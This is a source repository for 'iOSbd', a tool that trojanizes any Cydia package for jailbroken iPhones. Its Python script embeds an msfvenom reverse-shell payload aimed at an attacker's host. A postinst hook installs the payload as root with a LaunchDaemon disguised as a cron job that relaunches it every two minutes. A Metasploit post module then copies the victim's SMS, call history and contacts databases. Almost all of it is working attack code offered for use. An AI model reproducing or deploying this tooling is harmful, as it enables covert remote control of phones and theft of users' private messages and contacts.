├── README.md
├── ios_dump.rb
├── iosbd.py
└── src
    ├── DEBIAN
        ├── control
        └── postinst
    ├── Library
        └── LaunchDaemons
        │   └── com.cron.weekly.plist
    └── var
        └── mobile
            └── Library
                └── payme


/README.md:
--------------------------------------------------------------------------------
 1 | # iOSbd
 2 | iOSbd is a simple yet practical tool that will allow you to place a persistent backdoor inside of any cydia package desired. iOSbd relies on metasploit for it's payload, and LaunchDaemons for it's persistence. `ios_dump.rb` is a metasploit post module compatible with iOSbd, and can be installed by simply moving it to the `post/osx/gather/` directory. Youtube explaination and demo: https://www.youtube.com/watch?v=34VYX57vJm0
 3 | 
 4 | Dependencies
 5 | --------------
 6 | The following dependencies are needed before using iOSbd
 7 | - Metasploit: https://github.com/rapid7/metasploit-framework
 8 | - Dpkg: sudo apt-get install dpkg
 9 | 
10 | Usage
11 | -------------
12 | ```
13 | usage: iosbd.py [-h] [-p package] [-lh LHOST] [-lp LPORT] [-o output]
14 | 
15 | optional arguments:
16 |   -h, --help            show this help message and exit
17 |   -p package, --package package
18 |                         Package to backdoor
19 |   -lh LHOST, --lhost LHOST
20 |                         Host for reverse shell
21 |   -lp LPORT, --lport LPORT
22 |                         Port for reverse shell
23 |   -o output, --output output
24 |                         Path to save backdoored package
25 |                         
26 | ```
27 | 


--------------------------------------------------------------------------------
/ios_dump.rb:
--------------------------------------------------------------------------------
 1 | ##
 2 | # This module requires Metasploit: http://metasploit.com/download
 3 | # Current source: https://github.com/rapid7/metasploit-framework
 4 | ##
 5 | 
 6 | require 'msf/core'
 7 | 
 8 | class Metasploit3 < Msf::Post
 9 | 
10 |   include Msf::Post::File
11 | 
12 |   def initialize(info={})
13 |     super(update_info(info,
14 |         'Name'          => 'OSX Gather ios Store SMS',
15 |         'Description'   => %q{
16 |           'Print the date of desired session.'
17 |         },
18 |         'License'       => MSF_LICENSE,
19 |         'Author'        => [ 'Dyme' ],
20 |         'Platform'      => [ 'osx' ],
21 |         'SessionTypes'  => [ 'shell' ]
22 |     ))
23 |     register_options(
24 |       [
25 |         OptBool.new('SMS',  [false, 'Collect SMS database', true]),
26 |         OptBool.new('CALL', [false, 'Collect call history databse', true]),
27 |         OptBool.new('CONTACTS', [false, 'Collect contacts database', true]),
28 |       ], self.class)
29 |   end
30 | 
31 |   def run
32 |     if (datastore['SMS'])
33 |       sms_file = read_file("/private/var/mobile/Library/SMS/sms.db")
34 |       p1 = store_loot("sms.db", "binary/db", session, sms_file, "sms.db", "ios sms database")
35 |       print_good("SMS database saved: #{p1.to_s}")
36 |     end
37 |     if (datastore['CALL'])
38 |       calldb_file = read_file("/private/var/mobile/Library/CallHistoryDB/CallHistory.storedata")
39 |       p1 = store_loot("CallHistory.storedata", "binary/db", session, calldb_file, "CallHistory.db", "ios call history")
40 |       print_good("Call history database saved: #{p1.to_s}")
41 |     end
42 |     if (datastore['CONTACTS'])
43 |       contacts_file = read_file("/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb")
44 |       p1 = store_loot("AddressBook.sqlitedb", "binary/db", session, contacts_file, "AddressBook.db", "ios contacts database")
45 |       print_good("Contacts database saved: #{p1.to_s}")
46 |     end
47 |   end
48 | 
49 | end


--------------------------------------------------------------------------------
/iosbd.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | """
 3 | Dependancies:
 4 | 	Metasploit: https://github.com/rapid7/metasploit-framework
 5 | 	Dpkg:
 6 | 		sudo apt-get install dpkg
 7 | 		https://aur.archlinux.org/packages/dpkg/
 8 | 		If you're using RHEL or CentOS figure something out lmao
 9 | """
10 | import os, subprocess, argparse, sys
11 | 
12 | inspiration = """
13 |     ____            ____                                             
14 |  _,',--.`-.      _,',--.`-.                                          
15 | <_ ( () )  >  ( <_ ( () )  >    ATTENTION EVERYONE                   
16 |   `-:__;,-'    \  `A:__:,-'                                          
17 |                 \ / \           SORRY IF I'M A LITTLE TEARY RIGHT NOW
18 |                  ((  )                                               
19 |                   \-'           BUT IOSBD IS JIGGY                   
20 |          -Shimrod  \                                 AS FUCK         
21 |                     \                                                
22 |          (           )                                               
23 |           `-'"`-----'                                                """
24 | 
25 | dirs1 = ['tmp', 'var', 'mobile', 'Library', 'payme']
26 | dirs2 = ['tmp', 'Library', 'LaunchDaemons', 'com.cron.weekly.plist']
27 | dirs3 = ['tmp', 'DEBIAN', 'postinst']
28 | dirs = [dirs1, dirs2, dirs3]
29 | 
30 | blue = '\033[94m'
31 | red = '\033[91m'
32 | end = '\033[0m'
33 | 
34 | def create_backdoor(package, lhost, lport, output):
35 | 	print('[+] Generating armle payload...')
36 | 	try:
37 | 		subprocess.check_call('msfvenom -p osx/armle/shell_reverse_tcp LHOST=%s LPORT=%s -o src/var/mobile/Library/payme -f macho -a armle --platform osx &>/dev/null' % (lhost, lport), shell=True)
38 | 	except:
39 | 		print('%sPayload generation failed: Check MSF%s' % (red, end))
40 | 		sys.exit()
41 | 	print('[+] Inserting backdoor...')
42 | 	try:
43 | 		subprocess.check_call('dpkg-deb -R %s tmp' % package, shell=True)
44 | 		if os.path.exists('tmp/DEBIAN/postinst') == True:
45 | 			subprocess.check_call('mv tmp/DEBIAN/postinst tmp/DEBIAN/postinst2', shell=True)
46 | 		done = ''
47 | 		i = 0
48 | 		for array in dirs:
49 | 			for dir in array:
50 | 				i += 1
51 | 				if i < len(array):
52 | 					done += dir + '/'
53 | 					if os.path.exists(done) == False:
54 | 						os.mkdir(done, 0755)
55 | 				else:
56 | 					done += dir
57 | 					i = 0
58 | 			done2 = done.replace('tmp', 'src')
59 | 			subprocess.check_call('cp %s %s' % (done2, done), shell=True)
60 | 			done = ''
61 | 	except:
62 | 		print('%sFailed to insert backdoor%s' % (red, end))
63 | 		sys.exit()
64 | 	print('[+] Building new package...')
65 | 	try:
66 | 		subprocess.check_call('dpkg-deb -b tmp %s &>/dev/null; rm -r tmp' % output, shell=True)
67 | 	except:
68 | 		print('%sFailed to rebuild package%s' % (red, end))
69 | 		sys.exit()
70 | 	print('%sBackdoored package successfully created!%s' % (blue, end))
71 | 
72 | def main():
73 | 	print('%s\n' % inspiration[1:])
74 | 	parser = argparse.ArgumentParser()
75 | 	parser.add_argument('-p', '--package', dest='package', help='Package to backdoor', metavar='package')
76 | 	parser.add_argument('-lh', '--lhost', dest='lhost', help='Host for reverse shell', metavar='LHOST')
77 | 	parser.add_argument('-lp', '--lport', dest='lport', help='Port for reverse shell', metavar='LPORT')
78 | 	parser.add_argument('-o', '--output', dest='output', help='Path to save backdoored package', metavar='output', default='backdoor.deb')
79 | 	args = parser.parse_args()
80 | 	try:
81 | 		package = args.package
82 | 		lhost = args.lhost
83 | 		lport = args.lport
84 | 		output = args.output
85 | 		if package is None or lhost is None or lport is None:
86 | 			raise exception()
87 | 	except:
88 | 		parser.print_help()
89 | 		sys.exit()
90 | 
91 | 	create_backdoor(package, lhost, lport, output)
92 | 
93 | if __name__ == "__main__":
94 |     main()
95 | 


--------------------------------------------------------------------------------
/src/DEBIAN/control:
--------------------------------------------------------------------------------
1 | Package: com.dyme.iosbd
2 | Name: iosbd
3 | Version: 1.0
4 | Section: app
5 | Architecture: iphoneos-arm
6 | Description: A persistent backdoor for ios
7 | Author: Dyme <email@domain.whatever>
8 | Maintainer: Dyme <email@domain.whatever>
9 | 


--------------------------------------------------------------------------------
/src/DEBIAN/postinst:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | /bin/mv /var/mobile/Library/payme /var/root/Library/
 4 | /bin/cp /Library/LaunchDaemons/com.cron.weekly.plist /Library/LaunchDaemons/com.cron.daily.plist
 5 | /bin/chmod o+x /var/root/Library/payme
 6 | /bin/chown root:wheel /Library/LaunchDaemons/com.cron.weekly.plist
 7 | /bin/chown root:wheel /Library/LaunchDaemons/com.cron.daily.plist
 8 | /bin/launchctl load /Library/LaunchDaemons/com.cron.daily.plist
 9 | exit 0
10 | 


--------------------------------------------------------------------------------
/src/Library/LaunchDaemons/com.cron.weekly.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | <key>Label</key>
 6 | <string>com.cron.hello</string>
 7 | <key>ProgramArguments</key>
 8 | <array>
 9 | <string>/var/root/Library/payme</string>
10 | </array>
11 | <key>RunAtLoad</key>
12 | <true/>
13 | <key>StartInterval</key>
14 | <integer>120</integer>
15 | </dict>
16 | </plist>
17 | 


--------------------------------------------------------------------------------
/src/var/mobile/Library/payme:
--------------------------------------------------------------------------------
1 | tmp
2 | 


--------------------------------------------------------------------------------